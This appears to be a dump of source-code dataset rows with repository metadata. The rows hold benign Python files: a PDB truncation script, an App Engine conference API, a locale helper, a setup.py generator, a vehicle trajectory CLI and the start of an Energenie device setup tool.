repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
demharters/git_scripts | removeFirstLast.py | 1 | 1584 | #! /usr/bin/python
import sys
my_file = sys.argv[1]
myIdx = my_file.find(".pdb")
fout_name = my_file[:myIdx] + "_trunc.pdb"
my_dict = {}
myMax = []
myMin = []
# Create dictionary with chains as keys and lists of residues as values
with open(my_file,"r") as f:
for line in f:
if "ATOM" in line:
chain = line[21]
if chain in my_dict:
my_dict[chain].append(line[23:26].strip())
else:
my_dict[chain] = [line[23:26].strip()]
else:
pass
# Create lists for Min and Max residues for each chain
for i in my_dict:
myMax.append(max(my_dict[i], key=lambda x:int(x)))
myMin.append(min(my_dict[i], key=lambda x:int(x)))
# Copy input file without Max and Min residues
with open(my_file,"r") as f:
with open(fout_name,"w") as fout:
for line in f:
if "ATOM" in line:
k = 0
for i in my_dict:
#print "if %s in %s and (%s == %s or %s == %s):"%(i,line[21],line[23:26].strip(),myMax[k],line[23:26].strip(),myMin[k])
if i in line[21] and (line[23:26].strip() == myMax[k] or line[23:26].strip() == myMin[k]):
break
elif i in line[21] and (line[23:26].strip() != myMax[k] or line[23:26].strip() != myMin[k]):
fout.write(line)
else:
pass
k += 1
else:
fout.write(line)
| apache-2.0 | 2,306,010,707,959,049,700 | 26.310345 | 139 | 0.470328 | false | 3.391863 | false | false | false |
odinjv/conference-udacity | conference.py | 1 | 17989 | #!/usr/bin/env python
"""
conference.py -- Udacity conference server-side Python App Engine API;
uses Google Cloud Endpoints
$Id: conference.py,v 1.25 2014/05/24 23:42:19 wesc Exp wesc $
created by wesc on 2014 apr 21
"""
__author__ = '[email protected] (Wesley Chun)'
from datetime import datetime
import endpoints
from protorpc import messages
from protorpc import message_types
from protorpc import remote
from google.appengine.api import memcache
from google.appengine.ext import ndb
from models import Profile
from models import ProfileMiniForm
from models import ProfileForm
from models import StringMessage
from models import BooleanMessage
from models import Conference
from models import ConferenceForm
from models import ConferenceForms
from models import ConferenceQueryForms
from models import Session
from models import SessionForm
from models import SessionForms
from models import SessionQueryForm
from models import SessionQueryForms
from models import Speaker
from settings import WEB_CLIENT_ID
from settings import ANDROID_CLIENT_ID
from settings import IOS_CLIENT_ID
from settings import ANDROID_AUDIENCE
from utils import getUserId
import process.conferences
import process.sessions
import process.profiles
from process.speakers import MEMCACHE_FEATURED_SPEAKER_KEY
from process.announcements import MEMCACHE_ANNOUNCEMENTS_KEY
EMAIL_SCOPE = endpoints.EMAIL_SCOPE
API_EXPLORER_CLIENT_ID = endpoints.API_EXPLORER_CLIENT_ID
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
CONF_GET_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
websafeConferenceKey=messages.StringField(1),
)
CONF_POST_REQUEST = endpoints.ResourceContainer(
ConferenceForm,
websafeConferenceKey=messages.StringField(1),
)
SESSION_POST_REQUEST = endpoints.ResourceContainer(
SessionForm,
websafeConferenceKey=messages.StringField(1)
)
SESSION_QUERY_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
websafeConferenceKey=messages.StringField(1),
typeOfSession=messages.StringField(2)
)
SESSION_SPEAKER_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
speaker=messages.StringField(1)
)
SESSION_GET_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
websafeSessionKey=messages.StringField(1)
)
SESSION_DATE_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
date=messages.StringField(1)
)
SESSION_DURATION_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
min_duration=messages.IntegerField(1),
max_duration=messages.IntegerField(2)
)
SESSION_FILTER_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
not_type=messages.StringField(1, repeated=True),
start_hour=messages.IntegerField(2),
end_hour=messages.IntegerField(3)
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@endpoints.api(name='conference', version='v1', audiences=[ANDROID_AUDIENCE],
allowed_client_ids=[WEB_CLIENT_ID, API_EXPLORER_CLIENT_ID,
ANDROID_CLIENT_ID, IOS_CLIENT_ID],
scopes=[EMAIL_SCOPE])
class ConferenceApi(remote.Service):
"""Conference API v0.1"""
# - - - Conference objects - - - - - - - - - - - - - - - - -
@endpoints.method(ConferenceForm, ConferenceForm, path='conference',
http_method='POST', name='createConference')
def createConference(self, request):
"""Create new conference."""
return process.conferences.createConferenceObject(request)
@endpoints.method(CONF_POST_REQUEST, ConferenceForm,
path='conference/{websafeConferenceKey}',
http_method='PUT', name='updateConference')
def updateConference(self, request):
"""Update conference w/provided fields & return w/updated info."""
return process.conferences.updateConferenceObject(request)
@endpoints.method(CONF_GET_REQUEST, ConferenceForm,
path='conference/{websafeConferenceKey}',
http_method='GET', name='getConference')
def getConference(self, request):
"""Return requested conference (by websafeConferenceKey)."""
# get Conference object from request; bail if not found
conf = ndb.Key(urlsafe=request.websafeConferenceKey).get()
if not conf:
raise endpoints.NotFoundException((
'No conference found with key: %s'
)% request.websafeConferenceKey)
prof = conf.key.parent().get()
# return ConferenceForm
return process.conferences.copyConferenceToForm(
conf, getattr(prof, 'displayName')
)
@endpoints.method(message_types.VoidMessage, ConferenceForms,
path='getConferencesCreated',
http_method='POST', name='getConferencesCreated')
def getConferencesCreated(self, request):
"""Return conferences created by user."""
# make sure user is authed
user = endpoints.get_current_user()
if not user:
raise endpoints.UnauthorizedException('Authorization required')
user_id = getUserId(user)
# create ancestor query for all key matches for this user
confs = Conference.query(ancestor=ndb.Key(Profile, user_id))
prof = ndb.Key(Profile, user_id).get()
# return set of ConferenceForm objects per Conference
return ConferenceForms(
items=[
process.conferences.copyConferenceToForm(
conf, getattr(prof, 'displayName')
) for conf in confs
]
)
@endpoints.method(ConferenceQueryForms, ConferenceForms,
path='queryConferences',
http_method='POST',
name='queryConferences')
def queryConferences(self, request):
"""Query for conferences."""
conferences = process.conferences.getQuery(request)
# need to fetch organiser displayName from profiles
# get all keys and use get_multi for speed
organizers = [
(ndb.Key(Profile, conf.organizerUserId)) for conf in conferences
]
profiles = ndb.get_multi(organizers)
# put display names in a dict for easier fetching
names = {}
for profile in profiles:
names[profile.key.id()] = profile.displayName
# return individual ConferenceForm object per Conference
return ConferenceForms(
items=[
process.conferences.copyConferenceToForm(
conf, names[conf.organizerUserId]
) for conf in conferences
]
)
# - - - Session objects - - - - - - - - - - - - - - - - - - -
@endpoints.method(SESSION_POST_REQUEST, SessionForm,
path='conference/{websafeConferenceKey}/createSession',
http_method='POST', name='createSession')
def createSession(self, request):
"""Create a new session in selected conference."""
return process.sessions.createSessionObject(request)
@endpoints.method(CONF_GET_REQUEST, SessionForms,
path='conference/{websafeConferenceKey}/sessions',
http_method='GET', name='getConferenceSessions')
def getConferenceSessions(self, request):
"""List all the sessions on the selected conference."""
c_key = ndb.Key(urlsafe=request.websafeConferenceKey)
if not c_key.get():
raise endpoints.NotFoundException(
(
'No conference found with key: %s'
) % request.websafeConferenceKey
)
sessions = Session.query(ancestor=c_key)
sessions = sessions.order(Session.startTime)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
@endpoints.method(
SESSION_QUERY_REQUEST, SessionForms,
path='conference/{websafeConferenceKey}/sessions/{typeOfSession}',
http_method='GET', name='getConferenceSessionsByType'
)
def getConferenceSessionsByType(self, request):
"""List all the sessions of the selected Type."""
c_key = ndb.Key(urlsafe=request.websafeConferenceKey)
if not c_key.get():
raise endpoints.NotFoundException(
(
'No conference found with key: %s'
) % request.websafeConferenceKey
)
sessions = Session.query(ancestor=c_key)
sessions = sessions.filter(
Session.typeOfSession == request.typeOfSession
)
sessions = sessions.order(Session.startTime)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
@endpoints.method(SESSION_SPEAKER_REQUEST, SessionForms,
path='conference/sessions/speaker/{speaker}',
http_method='GET', name='getConferenceBySpeaker')
def getSessionsBySpeaker(self, request):
"""List of the sessions by the selected Speaker."""
speaker = Speaker.query(Speaker.name == request.speaker).get()
if not speaker:
raise endpoints.NotFoundException(
'Speaker %s is not registered' % request.speaker
)
sessions = Session.query(Session.speakerId == speaker.key.urlsafe())
sessions = sessions.order(Session.startTime)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
@endpoints.method(SESSION_DATE_REQUEST, SessionForms,
path='conference/sessions/date',
http_method='GET', name='getSessionsByDate')
def getSessionsByDate(self, request):
"""List of sessions on the selected date."""
sessions = Session.query()
sessions = sessions.filter(
Session.date == datetime.strptime(
request.date[:10], "%Y-%m-%d"
).date()
)
sessions.order(Session.startTime)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
@endpoints.method(SESSION_DURATION_REQUEST, SessionForms,
path='conference/sessions/duration',
http_method='GET', name='getSessionsByDuration')
def getSessionsByDuration(self, request):
"""List of sessions within the specified duration."""
sessions = Session.query()
sessions = sessions.filter(
Session.duration >= request.min_duration
)
sessions = sessions.filter(
Session.duration <= request.max_duration
)
sessions = sessions.order(Session.duration)
sessions = sessions.order(Session.startTime)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
@endpoints.method(SESSION_FILTER_REQUEST, SessionForms,
path='conference/sessions/filter',
http_method='GET', name='filterSessions')
def queryProblem(self, request):
"""Filter sessions by time of the day and type of session."""
sessions = Session.query()
sessions = sessions.filter(Session.startTime >= request.start_hour)
sessions = sessions.filter(Session.startTime <= request.end_hour)
sessions = sessions.order(Session.startTime)
items = []
for sess in sessions:
if sess.typeOfSession not in request.not_type:
items.append(process.sessions.copySessionToForm(sess))
return SessionForms(
items=items
)
@endpoints.method(SessionQueryForms, SessionForms,
path='conference/sessions/query',
http_method='GET', name='querySessions')
def querySessions(self, request):
"""Query sessions with user provided filters"""
sessions = process.sessions.getQuery(request)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
# - - - Featured Speaker - - - - - - - - - - - - - - - - - - -
@endpoints.method(message_types.VoidMessage, StringMessage,
path='conference/featured_speaker/get',
http_method='GET', name='getFeaturedSpeaker')
def getFeaturedSpeaker(self, request):
"""Return Featured Speaker from memcache."""
return StringMessage(
data=memcache.get(MEMCACHE_FEATURED_SPEAKER_KEY) or ""
)
# - - - Wishlist - - - - - - - - - - - - - - - - - - - - - - -
@endpoints.method(SESSION_GET_REQUEST, BooleanMessage,
path='addSessionToWishlist/{websafeSessionKey}',
http_method='POST', name='addSessionToWishlist')
def addSessionToWishlist(self, request):
"""Add a session to user Wishlist."""
prof = process.profiles.getProfileFromUser()
session = ndb.Key(urlsafe=request.websafeSessionKey).get()
if not session:
raise endpoints.NotFoundException(
'Session Not Found'
)
if not isinstance(session, Session):
raise endpoints.BadRequestException(
'Element provided is not a Session'
)
prof.sessionsWishlist.append(request.websafeSessionKey)
prof.put()
return BooleanMessage(data=True)
@endpoints.method(message_types.VoidMessage, SessionForms,
path='wishlist', http_method='GET',
name='getSessionsWishlist')
def getSessionsInWishlist(self, request):
"""List sessions saved on user Wishlist."""
prof = process.profiles.getProfileFromUser()
sess_keys = [ndb.Key(urlsafe=wsck) for wsck in prof.sessionsWishlist]
sessions = ndb.get_multi(sess_keys)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
# - - - Profile objects - - - - - - - - - - - - - - - - - - -
@endpoints.method(message_types.VoidMessage, ProfileForm,
path='profile', http_method='GET', name='getProfile')
def getProfile(self, request):
"""Return user profile."""
return process.profiles.doProfile()
@endpoints.method(ProfileMiniForm, ProfileForm,
path='profile', http_method='POST', name='saveProfile')
def saveProfile(self, request):
"""Update & return user profile."""
return process.profiles.doProfile(request)
# - - - Announcements - - - - - - - - - - - - - - - - - - - -
@endpoints.method(message_types.VoidMessage, StringMessage,
path='conference/announcement/get',
http_method='GET', name='getAnnouncement')
def getAnnouncement(self, request):
"""Return Announcement from memcache."""
return StringMessage(
data=memcache.get(MEMCACHE_ANNOUNCEMENTS_KEY) or ""
)
# - - - Registration - - - - - - - - - - - - - - - - - - - -
@endpoints.method(message_types.VoidMessage, ConferenceForms,
path='conferences/attending',
http_method='GET', name='getConferencesToAttend')
def getConferencesToAttend(self, request):
"""Get list of conferences that user has registered for."""
prof = process.profiles.getProfileFromUser() # get user Profile
conf_keys = [
ndb.Key(urlsafe=wsck) for wsck in prof.conferenceKeysToAttend
]
conferences = ndb.get_multi(conf_keys)
# get organizers
organisers = [
ndb.Key(Profile, conf.organizerUserId) for conf in conferences
]
profiles = ndb.get_multi(organisers)
# put display names in a dict for easier fetching
names = {}
for profile in profiles:
names[profile.key.id()] = profile.displayName
# return set of ConferenceForm objects per Conference
return ConferenceForms(
items=[process.conferences.copyConferenceToForm(
conf, names[conf.organizerUserId]
) for conf in conferences]
)
@endpoints.method(CONF_GET_REQUEST, BooleanMessage,
path='conference/{websafeConferenceKey}',
http_method='POST', name='registerForConference')
def registerForConference(self, request):
"""Register user for selected conference."""
return process.conferences.conferenceRegistration(request)
@endpoints.method(CONF_GET_REQUEST, BooleanMessage,
path='conference/{websafeConferenceKey}',
http_method='DELETE', name='unregisterFromConference')
def unregisterFromConference(self, request):
"""Unregister user for selected conference."""
return process.conferences.conferenceRegistration(request, reg=False)
@endpoints.method(message_types.VoidMessage, ConferenceForms,
path='filterPlayground',
http_method='GET', name='filterPlayground')
def filterPlayground(self, request):
"""Filter Playground"""
q = Conference.query()
# field = "city"
# operator = "="
# value = "London"
# f = ndb.query.FilterNode(field, operator, value)
# q = q.filter(f)
q = q.filter(Conference.city == "London")
q = q.filter(Conference.topics == "Medical Innovations")
q = q.filter(Conference.month == 6)
return ConferenceForms(
items=[
process.conferences.copyConferenceToForm(conf,
"") for conf in q
]
)
api = endpoints.api_server([ConferenceApi]) # register API
| apache-2.0 | 7,087,268,235,147,335,000 | 36.090722 | 77 | 0.627773 | false | 4.19324 | false | false | false |
Outernet-Project/librarian | librarian/helpers/lang.py | 1 | 1268 | # -*- coding: utf-8 -*-
"""
lang.py: Locale constants
Copyright 2014-2015, Outernet Inc.
Some rights reserved.
This software is free software licensed under the terms of GPLv3. See COPYING
file that comes with the source code, or http://www.gnu.org/licenses/gpl.txt.
"""
from __future__ import unicode_literals
from bottle_utils.i18n import lazy_gettext as _
from ..core.contrib.i18n.consts import LOCALES, LANGS
from ..core.contrib.templates.decorators import template_helper
SELECT_LANGS = [('', _('any language'))] + LANGS
RTL_LANGS = ['ar', 'he', 'ur', 'yi', 'ji', 'iw', 'fa']
def lang_name(code):
""" Return native language name for locale code """
return LOCALES[code]
@template_helper()
def lang_name_safe(code):
""" Return native language name for locale code """
try:
return lang_name(code)
except KeyError:
return _('unknown')
@template_helper()
def is_rtl(code):
return code in RTL_LANGS
@template_helper()
def dir(code):
return 'rtl' if code in RTL_LANGS else 'auto'
@template_helper()
def i18n_attrs(lang):
s = ''
if lang:
# XXX: Do we want to keep the leading space?
s += ' lang="%s"' % lang
if template_helper.is_rtl(lang):
s += ' dir="rtl"'
return s
| gpl-3.0 | -4,302,272,209,746,936,000 | 21.245614 | 77 | 0.649054 | false | 3.328084 | false | false | false |
vyscond/nest | nest/__init__.py | 1 | 2910 | import os
import re
import json
import argparse
import pip
import copy
from collections import OrderedDict
from setuptools import find_packages
BASE_FOLDER = os.path.basename(os.path.abspath('.')).replace(' ', '-').lower()
EXCLUDE_FOLDERS = ['contrib','docs','tests*']
TEXT_FILES = '([A-Za-z]+)(\_[A-Za-z]+)*\.(rst|md)$'
SETUPPY = 'from setuptools import setup\nsetup(\n{args}\n)\n'
CONSOLE_SCRIPT = '^([A-Za-z]+)(\_([A-Za-z]+))*\=([A-Za-z]+(\_[A-Za-z]+)*)(\.[A-Za-z]+(\_[A-Za-z]+)*)*\:([A-Za-z]+)(\_([A-Za-z]+))*$'
CLASSIFIERS = ''.join(open('classifiers.txt')).split('\n')
class ConsoleScripts(OrderedDict):
def add(self)
class Setup(OrderedDict):
def __init__(self, fname='setup.json'):
try:
with open(fname) as f:
setup = json.load(f, object_pairs_hook=OrderedDict)
except IOError:
setup = OrderedDict()
super(Setup, self).__init__(setup)
def __str__(self):
return json.dumps(self, indent=4)
def save(self):
with open(self.file, 'w') as f:
f.write(str(self))
class Setup2(OrderedDict):
def __init__(self):
self.file = 'setup.json'
try:
with open(self.file) as f:
setup = json.load(f, object_pairs_hook=OrderedDict)
except IOError:
setup = OrderedDict()
super(Setup,self).__init__(setup)
def __str__(self): # debug only
return json.dumps(self, indent=4)
def save(self):
with open(self.file, 'w') as f:
f.write(str(self))
def add_console_scripts(self, name, module):
if re.match(CONSOLE_SCRIPT, name+'='+module):
if 'entry_points' not in self.keys():
self['entry_points'] = {}
self['entry_points']['console_scripts'] = {}
self['entry_points']['console_scripts'][name] = module
else:
return 1
def gen(self):
'''generates a new setup.py based on your setup.json'''
setuppy = copy.deepcopy(self)
# - Adjust console scripts
setuppy['entry_points']['console_scripts'] = []
for name, module in self['entry_points']['console_scripts'].items():
setuppy['entry_points']['console_scripts'].append(
'{}={}'.format(name, module)
)
setuppy = json.dumps(setuppy, indent=4)
# - Adjust file based entries
for key in ['long_description']:
if re.match(TEXT_FILES, self[key]) :
setuppy=setuppy.replace(
'"'+self[key]+'"', '"".join(open("'+self[key]+'"))'
)
# - Replacing ":" for "="
for basekey in self.keys():
setuppy = setuppy.replace('"'+basekey+'":', basekey+' =')
setuppy = setuppy[1:-1]
with open('setup.py', 'w') as f:
f.write(SETUPPY.format(args=setuppy))
| mit | -7,759,981,346,841,378,000 | 30.978022 | 132 | 0.540206 | false | 3.579336 | false | false | false |
pythonindia/junction | junction/proposals/forms.py | 1 | 9639 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django import forms
from django.utils.safestring import mark_safe
from django.utils.timezone import now
from pagedown.widgets import PagedownWidget
from junction.base.constants import (
ConferenceSettingConstants,
ProposalReviewerComment,
ProposalReviewStatus,
ProposalStatus,
ProposalTargetAudience,
ProposalVotesFilter,
)
from junction.proposals.models import (
ProposalSection,
ProposalSectionReviewerVoteValue,
ProposalType,
)
def _get_proposal_section_choices(conference, action="edit"):
if action == "create":
return [
(str(cps.id), cps.name)
for cps in ProposalSection.objects.filter(conferences=conference)
]
else:
return [
(str(cps.id), cps.name)
for cps in ProposalSection.objects.filter(conferences=conference)
]
def _get_proposal_type_choices(conference, action="edit"):
if action == "create":
return [
(str(cpt.id), cpt.name)
for cpt in ProposalType.objects.filter(
conferences=conference, end_date__gt=now()
)
]
else:
return [
(str(cpt.id), cpt.name)
for cpt in ProposalType.objects.filter(conferences=conference)
]
def _get_proposal_section_reviewer_vote_choices(conference):
allow_plus_zero_vote = ConferenceSettingConstants.ALLOW_PLUS_ZERO_REVIEWER_VOTE
plus_zero_vote_setting = conference.conferencesetting_set.filter(
name=allow_plus_zero_vote["name"]
).first()
if plus_zero_vote_setting:
plus_zero_vote_setting_value = plus_zero_vote_setting.value
else:
plus_zero_vote_setting_value = True
values = []
for i in ProposalSectionReviewerVoteValue.objects.all().reverse():
if i.vote_value == 0 and not plus_zero_vote_setting_value:
continue
values.append((i.vote_value, "{}".format(i.description)))
return values
class HorizRadioRenderer(forms.RadioSelect.renderer):
"""
This overrides widget method to put radio buttons horizontally instead of vertically.
"""
def render(self):
"""Outputs radios"""
return mark_safe("\n".join(["%s\n" % w for w in self]))
class ProposalForm(forms.Form):
"""
Used for create/edit
"""
title = forms.CharField(
min_length=10,
help_text="Title of the Proposal",
widget=forms.TextInput(attrs={"class": "charfield"}),
)
description = forms.CharField(
widget=PagedownWidget(show_preview=True), help_text=("Describe your Proposal")
)
target_audience = forms.ChoiceField(
label="Target Audience",
choices=ProposalTargetAudience.CHOICES,
widget=forms.Select(attrs={"class": "dropdown"}),
)
status = forms.ChoiceField(
widget=forms.Select(attrs={"class": "dropdown"}),
choices=ProposalStatus.CHOICES,
help_text=(
"If you choose DRAFT people can't see the session in the list."
" Make the proposal PUBLIC when you're done editing."
),
)
proposal_type = forms.ChoiceField(
label="Proposal Type", widget=forms.Select(attrs={"class": "dropdown"})
)
proposal_section = forms.ChoiceField(
label="Proposal Section", widget=forms.Select(attrs={"class": "dropdown"})
)
# Additional Content
prerequisites = forms.CharField(
label="Pre-requisites",
widget=PagedownWidget(show_preview=True),
required=False,
help_text="What should the participants know before attending your session?",
)
video_url = forms.CharField(
label="Video URL",
required=False,
help_text="Short 1-2 min video describing your talk",
widget=forms.TextInput(attrs={"class": "charfield"}),
)
content_urls = forms.CharField(
label="Content URLs",
widget=PagedownWidget(show_preview=True),
required=False,
help_text="Links to your session like GitHub repo, Blog, Slideshare etc ...",
)
private_content_urls = forms.BooleanField(
help_text="Check the box if you want to make your content URLs private",
label="Make the context URLs private",
required=False,
)
speaker_info = forms.CharField(
label="Speaker Information",
widget=PagedownWidget(show_preview=True),
required=False,
help_text="Say something about yourself, work etc...",
)
is_first_time_speaker = forms.BooleanField(
label="First Time Speaker",
required=False,
help_text="Please mark, if you are a first time speaker for any conference or meetup,"
"not just for PyCon India",
)
speaker_links = forms.CharField(
label="Speaker Links",
widget=PagedownWidget(show_preview=True),
required=False,
help_text="Links to your previous work like Blog, Open Source Contributions etc ...",
)
def __init__(self, conference, action="edit", *args, **kwargs):
super(ProposalForm, self).__init__(*args, **kwargs)
self.fields["proposal_section"].choices = _get_proposal_section_choices(
conference, action=action
)
self.fields["proposal_type"].choices = _get_proposal_type_choices(
conference, action=action
)
@classmethod
def populate_form_for_update(self, proposal):
form = ProposalForm(
proposal.conference,
initial={
"title": proposal.title,
"description": proposal.description,
"target_audience": proposal.target_audience,
"prerequisites": proposal.prerequisites,
"video_url": proposal.video_url,
"content_urls": proposal.content_urls,
"private_content_urls": proposal.private_content_urls,
"speaker_info": proposal.speaker_info,
"speaker_links": proposal.speaker_links,
"is_first_time_speaker": proposal.is_first_time_speaker,
"status": proposal.status,
"proposal_section": proposal.proposal_section.pk,
"proposal_type": proposal.proposal_type.pk,
},
)
return form
class ProposalCommentForm(forms.Form):
"""
Used to add comments
"""
comment = forms.CharField(widget=PagedownWidget(show_preview=True))
private = forms.BooleanField(required=False, widget=forms.HiddenInput())
reviewer = forms.BooleanField(required=False, widget=forms.HiddenInput())
class ProposalReviewForm(forms.Form):
"""
Used to review the proposal.
"""
review_status = forms.ChoiceField(
choices=ProposalReviewStatus.CHOICES, widget=forms.RadioSelect()
)
class ProposalReviewerVoteForm(forms.Form):
"""
Used by ProposalSectionReviewers to vote on proposals.
"""
vote_value = forms.ChoiceField(
widget=forms.RadioSelect(),
label="Do you think this proposal will make a good addition to PyCon India ?",
)
comment = forms.CharField(
widget=forms.Textarea(attrs={"minlength": "30"}),
help_text="Leave a comment justifying your vote.",
)
def __init__(self, *args, **kwargs):
conference = kwargs.pop("conference", None)
super(ProposalReviewerVoteForm, self).__init__(*args, **kwargs)
choices = _get_proposal_section_reviewer_vote_choices(conference)
self.fields["vote_value"].choices = choices
class ProposalTypesChoices(forms.Form):
"""
Base proposal form with proposal sections & types.
"""
proposal_section = forms.ChoiceField(
widget=forms.Select(attrs={"class": "dropdown"})
)
proposal_type = forms.ChoiceField(widget=forms.Select(attrs={"class": "dropdown"}))
def __init__(self, conference, *args, **kwargs):
super(ProposalTypesChoices, self).__init__(*args, **kwargs)
self.fields["proposal_section"].choices = _get_proposal_section_choices(
conference
)
self.fields["proposal_type"].choices = _get_proposal_type_choices(conference)
class ProposalsToReviewForm(ProposalTypesChoices):
"""
Used to filter proposals
"""
reviewer_comment = forms.ChoiceField(
widget=forms.Select(attrs={"class": "dropdown"})
)
def __init__(self, conference, proposal_sections, *args, **kwargs):
super(ProposalsToReviewForm, self).__init__(conference, *args, **kwargs)
ps_choices = [(str(ps.id), ps.name) for ps in proposal_sections]
self.fields["reviewer_comment"].choices = ProposalReviewerComment.CHOICES
self.fields["proposal_section"].choices = ps_choices
for name, field in list(self.fields.items()):
field.choices.insert(0, ("all", "All"))
class ProposalVotesFilterForm(ProposalTypesChoices):
"""
Form to filter proposals based on votes and review_status.
"""
votes = forms.ChoiceField(widget=forms.Select(attrs={"class": "dropdown votes"}))
review_status = forms.ChoiceField(widget=forms.Select(attrs={"class": "dropdown"}))
def __init__(self, conference, *args, **kwargs):
super(ProposalVotesFilterForm, self).__init__(conference, *args, **kwargs)
self.fields["votes"].choices = ProposalVotesFilter.CHOICES
self.fields["review_status"].choices = ProposalReviewStatus.CHOICES
for name, field in list(self.fields.items()):
field.choices.insert(0, ("all", "All"))
| mit | -3,384,632,938,890,905,600 | 33.060071 | 94 | 0.637514 | false | 4.036432 | false | false | false |
decabyte/vehicle_core | scripts/trajectory_cli.py | 1 | 4003 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division
import sys
import argparse
import numpy as np
np.set_printoptions(precision=3, suppress=True)
from numpy import cos, sin
# fix imports
sys.path.append('../src')
from vehicle_core.path import trajectory_tools as tt
# constants
T_TYPES = [
'surge',
'sway',
'heave',
'yaw',
'surge+heave',
'sway+heave',
'yaw+heave'
]
def main():
parser = argparse.ArgumentParser(description="Utility for generating navigation trajectories used by navigator module.",
epilog="This is part of vehicle_pilot module.")
parser.add_argument('type', choices=T_TYPES, metavar='type', help='Specify the DOFs used by the trajectory.')
parser.add_argument('n', type=float, help='Initial NORTH coordinate.')
parser.add_argument('e', type=float, help='Initial EAST coordinate.')
parser.add_argument('d', type=float, help='Initial DEPTH coordinate.')
parser.add_argument('y', type=float, help='Initial YAW coordinate.')
parser.add_argument('delta_dof', type=float, metavar='delta_dof', help='Maximum displacement in <type> trajectory.')
parser.add_argument('--output', default='json', help='Output trajectory format.')
parser.add_argument('-v', '--verbose', action='store_true', help='Print detailed information.')
args = parser.parse_args()
# check displacement
if args.delta_dof < 1 or args.delta_dof > 15:
print('Could not generate trajectory with {} maximum displacement.\n'.format(args.delta_dof))
sys.exit(1)
if args.d < 0 or args.d > 3:
print('Could not generate trajectory with {} maximum displacement.\n'.format(args.delta_dof))
sys.exit(1)
if args.y > np.pi or args.y < -np.pi:
print('Could not generate trajectory with {} yaw angle (-pi, pi).\n'.format(args.y))
sys.exit(1)
# waypoints matrix
C = 10
N = 2 * C + 1
WPS = np.zeros((N, 6))
# initial position
INIT = np.array([args.n, args.e, args.d, 0, 0, args.y])
WPS = np.tile(INIT, (N, 1))
# displacements
dw = [args.delta_dof]
# select geometry
if args.type == 'surge':
dof = [0]
elif args.type == 'sway':
dof = [1]
elif args.type == 'heave':
dof = [2]
dw = [min(args.delta_dof, 3)]
elif args.type == 'yaw':
dof = [5]
elif args.type == 'surge+heave':
dof = [0,2]
dw = [args.delta_dof, min(args.delta_dof, 3)]
elif args.type == 'sway+heave':
dof = [1,2]
dw = [args.delta_dof, min(args.delta_dof, 3)]
elif args.type == 'yaw+heave':
dof = [5,2]
dw = [args.delta_dof, min(args.delta_dof, 3)]
else:
print('Could not generate {} trajectory geometry.\n'.format(args.type))
sys.exit(1)
# trajectory generation
for i,d in enumerate(dof):
w_max = WPS[0, d] + dw[i]
w_min = WPS[0, d] + np.ceil(dw[i] / N)
WPS[1::2, d] = np.linspace(w_max, w_min, num=C)
WPS[2::2, d] = WPS[0, d] * np.ones((C,))
# compensate for initial yaw
ROT = np.eye(6) # rotation matrix
r = 0 # roll
p = 0 # pitch
y = WPS[0,5] # yaw
# set the rotation using current attitude
ROT[0:2, 0:2] = [
[cos(p)*cos(y), cos(r)*sin(y)+sin(r)*sin(p)*cos(y)],
[-cos(p)*sin(y), cos(r)*cos(y)-sin(r)*sin(p)*sin(y)]
]
# apply rotation
WPR = np.dot(WPS, ROT)
# trajectory export
spec = {
'type': args.type,
'delta': dw,
'dof': dof
}
if args.verbose:
print(WPS)
print(' ')
print(WPR)
print(' ')
tt.plot_trajectory(WPR, arrow_length=0.2)
# print final trajectory
try:
import yaml
print(yaml.dump(tt.traj_as_dict(WPR, **spec)))
except ImportError:
import json
print(json.dumps(tt.traj_as_dict(WPR, **spec)))
if __name__ == '__main__':
main()
| bsd-3-clause | 1,329,321,018,923,603,700 | 26.798611 | 125 | 0.57307 | false | 3.149489 | false | false | false |
adtennant/homebridge-energenie | lib/pyenergenie/src/setup_tool.py | 2 | 8531 | # setup_tool.py 28/05/2016 D.J.Whale
#
# A simple menu-driven setup tool for the Energenie Python library.
#
# Just be a simple menu system.
# This then means you don't have to have all this in the demo apps
# and the demo apps can just refer to object variables names
# from an assumed auto_create registry, that is built using this setup tool.
import time
import energenie
##from energenie.lifecycle import *
#===== GLOBALS =====
quit = False
#===== INPUT METHODS ==========================================================
try:
readin = raw_input # Python 2
except NameError:
readin = input # Python 3
def get_house_code():
"""Get a house code or default to Energenie code"""
while True:
try:
hc = readin("House code (ENTER for default)? ")
if hc == "": return None
except KeyboardInterrupt:
return None # user abort
try:
house_code = int(hc, 16)
return house_code
except ValueError:
print("Must enter a number")
def get_device_index():
"""get switch index, default 1 (0,1,2,3,4)"""
while True:
try:
di = readin("Device index 1..4 (ENTER for all)? ")
except KeyboardInterrupt:
return None # user abort
if di == "": return 0 # ALL
try:
device_index = int(di)
return device_index
except ValueError:
print("Must enter a number")
def show_registry():
"""Show the registry as a numbered list"""
i=1
names = []
for name in energenie.registry.names():
